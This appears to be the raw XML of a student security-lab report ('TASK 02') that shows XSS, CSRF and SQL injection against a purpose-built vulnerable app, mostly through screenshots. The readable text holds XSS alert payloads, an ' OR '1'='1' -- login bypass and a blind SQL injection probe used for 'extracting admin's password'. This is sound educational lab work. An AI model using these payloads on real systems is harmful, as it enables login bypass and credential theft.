    <w:p w14:paraId="77B323BC" w14:textId="77777777" w:rsidR="0038206F" w:rsidRDefault="0038206F" w:rsidP="000B18B8"/>
    <w:p w14:paraId="6D3D4CB6" w14:textId="6FB09900" w:rsidR="0038206F" w:rsidRDefault="0038206F" w:rsidP="0038206F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>TASK 02:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AFA975" w14:textId="6604D73A" w:rsidR="001C6683" w:rsidRDefault="001C6683" w:rsidP="001C6683">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558133DE" w14:textId="77777777" w:rsidR="001C6683" w:rsidRPr="001C6683" w:rsidRDefault="001C6683" w:rsidP="001C6683"/>
    <w:p w14:paraId="6112EA2B" w14:textId="7BD73796" w:rsidR="004077C4" w:rsidRPr="004077C4" w:rsidRDefault="004077C4" w:rsidP="000B18B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004077C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vulnerable mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65290F0F" w14:textId="391E6861" w:rsidR="004077C4" w:rsidRDefault="004077C4" w:rsidP="000B18B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21FF6286" wp14:editId="47DAC8B1">
            <wp:extent cx="5943600" cy="1540510"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="21590"/>
            <wp:docPr id="1498605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540510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx2"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C135E" w14:textId="481DFDBA" w:rsidR="004077C4" w:rsidRPr="004077C4" w:rsidRDefault="004077C4" w:rsidP="000B18B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004077C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Safe mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C39563B" w14:textId="4F8FE3EE" w:rsidR="004077C4" w:rsidRDefault="004077C4" w:rsidP="000B18B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6867F77C" wp14:editId="771BA99B">
            <wp:extent cx="5943600" cy="1271905"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="23495"/>
            <wp:docPr id="1839345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71905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx2"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12460D70" w14:textId="5AF76CB9" w:rsidR="0038206F" w:rsidRPr="004077C4" w:rsidRDefault="004077C4" w:rsidP="000B18B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004077C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trigger Reflected XSS through the real search box:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406AE837" w14:textId="22C5263C" w:rsidR="004077C4" w:rsidRDefault="004077C4" w:rsidP="000B18B8">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004077C4">
        <w:t>&lt;script&gt;alert('Reflected XSS')&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3F84C8" w14:textId="42F86F87" w:rsidR="004077C4" w:rsidRDefault="004077C4" w:rsidP="000B18B8">
      <w:r w:rsidRPr="004077C4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FDB5812" wp14:editId="3D17F3F9">
            <wp:extent cx="5943600" cy="2640330"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="192144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48752" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2640330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="431F61AE" w14:textId="77777777" w:rsidR="00C94E2A" w:rsidRDefault="00C94E2A" w:rsidP="000B18B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="128EB893" w14:textId="2085ABE0" w:rsidR="004077C4" w:rsidRPr="00C94E2A" w:rsidRDefault="00C94E2A" w:rsidP="000B18B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C94E2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submit a script payload through the bio form:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7C64BE" w14:textId="52EA3F12" w:rsidR="00C94E2A" w:rsidRDefault="00C94E2A" w:rsidP="000B18B8">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94E2A">
        <w:t>&lt;script&gt;alert('Stored XSS')&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DDE635" w14:textId="33AF4885" w:rsidR="00C94E2A" w:rsidRDefault="00C94E2A" w:rsidP="000B18B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50338DF2" wp14:editId="31FB73F7">
            <wp:extent cx="5943600" cy="2660015"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="26035"/>
            <wp:docPr id="14374116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660015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx2"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA46238" w14:textId="3E7DEEDF" w:rsidR="00C94E2A" w:rsidRDefault="00C94E2A" w:rsidP="000B18B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C94E2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trigger the DOM-based XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126F2A10" w14:textId="4F5D88F8" w:rsidR="00F47486" w:rsidRPr="00F47486" w:rsidRDefault="00F47486" w:rsidP="000B18B8">
      <w:r w:rsidRPr="00F47486">
        <w:t>#&lt;img src=x onerror="alert('DOM XSS')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73345FAD" w14:textId="6E068C3A" w:rsidR="00C94E2A" w:rsidRDefault="00DA1198" w:rsidP="000B18B8">
      <w:r w:rsidRPr="00DA1198">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C3E729A" wp14:editId="4703F37D">
            <wp:extent cx="5943600" cy="3179445"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="143032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29214" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3179445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B410D8E" w14:textId="77777777" w:rsidR="001C6683" w:rsidRDefault="001C6683" w:rsidP="000B18B8"/>
    <w:p w14:paraId="62C1B139" w14:textId="319D3F6F" w:rsidR="001C6683" w:rsidRDefault="001C6683" w:rsidP="001C6683">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CSRF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E0254" w14:textId="5092EE29" w:rsidR="001C6683" w:rsidRDefault="001C6683" w:rsidP="001C6683">
      <w:r>
        <w:t>Before:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D466B7" w14:textId="62B8E933" w:rsidR="00C94E2A" w:rsidRDefault="001C6683" w:rsidP="000B18B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AD72277" wp14:editId="60F5BBCB">
            <wp:extent cx="5943600" cy="3495675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="16993425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42516" name="Picture 1699342516"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3495675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B0894F" w14:textId="15FC72B6" w:rsidR="001C6683" w:rsidRDefault="001C6683" w:rsidP="000B18B8">
      <w:r>
        <w:t>Attacker site:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7FD432" w14:textId="10A3A8D0" w:rsidR="001C6683" w:rsidRDefault="001C6683" w:rsidP="000B18B8">
      <w:r w:rsidRPr="001C6683">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="718FEC0E" wp14:editId="361C0433">
            <wp:extent cx="5943600" cy="3157220"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="139123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31223" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3157220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8ABBFC" w14:textId="198D2D11" w:rsidR="001C6683" w:rsidRDefault="001C6683" w:rsidP="000B18B8">
      <w:r>
        <w:t>After Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0FBC5F" w14:textId="488DBE01" w:rsidR="001C6683" w:rsidRDefault="001C6683" w:rsidP="000B18B8">
      <w:r w:rsidRPr="001C6683">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00BF16C4" wp14:editId="2A77EED1">
            <wp:extent cx="5943600" cy="3162300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="209447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77114" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3162300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3360D765" w14:textId="77777777" w:rsidR="004D7E08" w:rsidRDefault="004D7E08" w:rsidP="000B18B8"/>
    <w:p w14:paraId="5A551B21" w14:textId="77777777" w:rsidR="004D7E08" w:rsidRDefault="004D7E08" w:rsidP="000B18B8"/>
    <w:p w14:paraId="7F50AD13" w14:textId="77777777" w:rsidR="004D7E08" w:rsidRDefault="004D7E08" w:rsidP="000B18B8"/>
    <w:p w14:paraId="6216D331" w14:textId="77777777" w:rsidR="004D7E08" w:rsidRDefault="004D7E08" w:rsidP="000B18B8"/>
    <w:p w14:paraId="32FB2CBC" w14:textId="77777777" w:rsidR="004D7E08" w:rsidRDefault="004D7E08" w:rsidP="004D7E08"/>
    <w:p w14:paraId="68EFFDCA" w14:textId="354503A1" w:rsidR="004D7E08" w:rsidRDefault="004D7E08" w:rsidP="004D7E08">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404505C5" w14:textId="1ADC53C3" w:rsidR="004D7E08" w:rsidRDefault="004D7E08" w:rsidP="004D7E08">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Easy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD679A4" w14:textId="420DF145" w:rsidR="004D7E08" w:rsidRDefault="00BC6B8E" w:rsidP="004D7E08">
      <w:r w:rsidRPr="00BC6B8E">
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5836FA80" w14:textId="72E46E46" w:rsidR="00BC6B8E" w:rsidRDefault="00BC6B8E" w:rsidP="004D7E08">
      <w:r w:rsidRPr="00BC6B8E">
        <w:t>Username: ' OR '1'='1' -- Password: (anything, ignored entirely)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74770868" w14:textId="0A4E0604" w:rsidR="00BC6B8E" w:rsidRDefault="00BC6B8E" w:rsidP="004D7E08">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E497E13" wp14:editId="61E060F8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>158750</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>315595</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4565650" cy="355600"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="1856893438" name="Rectangle 4"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4565650" cy="3556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C756B6" id="Rectangle 4" o:spid="_x0000_s1026" style="position:absolute;margin-left:12.5pt;margin-top:24.85pt;width:359.5pt;height:2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" filled="f" strokecolor="#e00" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19790F7B" w14:textId="70781A01" w:rsidR="00BC6B8E" w:rsidRDefault="00BC6B8E" w:rsidP="004D7E08">
      <w:r w:rsidRPr="00BC6B8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A8A8682" wp14:editId="10406188">
            <wp:extent cx="5943600" cy="1162685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22496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68785" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1162685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC34786" w14:textId="57D01B11" w:rsidR="00BC6B8E" w:rsidRDefault="00BC6B8E" w:rsidP="004D7E08">
      <w:r w:rsidRPr="00BC6B8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BE5AC37" wp14:editId="62EC27E8">
            <wp:extent cx="5943600" cy="3632835"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="5985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8157" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3632835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77200976" w14:textId="77777777" w:rsidR="00BC6B8E" w:rsidRDefault="00BC6B8E" w:rsidP="004D7E08"/>
    <w:p w14:paraId="520C241C" w14:textId="77777777" w:rsidR="005A6B41" w:rsidRDefault="005A6B41" w:rsidP="00BC6B8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765389B9" w14:textId="53C1EF74" w:rsidR="00BC6B8E" w:rsidRDefault="00BC6B8E" w:rsidP="00BC6B8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Intermediate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7002EBF4" w14:textId="77777777" w:rsidR="005A6B41" w:rsidRDefault="005A6B41" w:rsidP="004D7E08"/>
    <w:p w14:paraId="4677A1DE" w14:textId="2488263B" w:rsidR="005A6B41" w:rsidRDefault="005A6B41" w:rsidP="004D7E08">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="162F7349" wp14:editId="13BA4D5A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>15857</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2182932</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4186155" cy="671265"/>
                <wp:effectExtent l="0" t="0" r="24130" b="14605"/>
                <wp:wrapNone/>
                <wp:docPr id="2050071380" name="Rectangle 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4186155" cy="67126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7ED907" id="Rectangle 5" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.25pt;margin-top:171.9pt;width:329.6pt;height:52.8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" filled="f" strokecolor="#e00" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005A6B41">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09E2DE9B" wp14:editId="1A8F9CB4">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="16432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4389" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEBBE2F" w14:textId="072C55F6" w:rsidR="005A6B41" w:rsidRDefault="005A6B41" w:rsidP="004D7E08">
      <w:r>
        <w:t>Checked with user that does not exist:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ED4D9F" w14:textId="15464551" w:rsidR="005A6B41" w:rsidRDefault="005A6B41" w:rsidP="004D7E08">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4899BDA3" wp14:editId="1A0C7577">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>42284</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2177213</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5047700" cy="607838"/>
                <wp:effectExtent l="0" t="0" r="19685" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="1801031113" name="Rectangle 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5047700" cy="60783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4C454C" id="Rectangle 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:3.35pt;margin-top:171.45pt;width:397.45pt;height:47.8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" filled="f" strokecolor="#e00" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005A6B41">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B779174" wp14:editId="51382B12">
            <wp:extent cx="5943600" cy="3330575"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="80001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18618" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3330575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="074A2818" w14:textId="59E54323" w:rsidR="002C1633" w:rsidRPr="002C1633" w:rsidRDefault="002C1633" w:rsidP="004D7E08">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1633">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Extracting A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1633">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>min’s password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D127BF" w14:textId="6BB827AB" w:rsidR="00FE793F" w:rsidRDefault="00FE793F" w:rsidP="004D7E08">
      <w:r>
        <w:t>Checking password length:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EF71F0" w14:textId="3C5F7702" w:rsidR="002C1633" w:rsidRDefault="002C1633" w:rsidP="004D7E08">
      <w:r>
        <w:t xml:space="preserve">Used in student lookup:  </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1633">
        <w:t xml:space="preserve">admin' AND LENGTH(password)=16 </w:t>
      </w:r>
      <w:r w:rsidR="00532C6A">
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3E9B24" w14:textId="21A23963" w:rsidR="002C1633" w:rsidRDefault="002C1633" w:rsidP="004D7E08">
      <w:r>
        <w:t>Got : Student exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CB057C" w14:textId="46C75C22" w:rsidR="002C1633" w:rsidRDefault="002C1633" w:rsidP="004D7E08">
      <w:r>
        <w:t>Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538B4BB0" w14:textId="0DC8CB26" w:rsidR="00FE793F" w:rsidRDefault="002C1633" w:rsidP="004D7E08">
      <w:r w:rsidRPr="002C1633">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="719F4972" wp14:editId="256CB764">
            <wp:extent cx="5943600" cy="492125"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="22225"/>
            <wp:docPr id="126869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92633" name=""/>
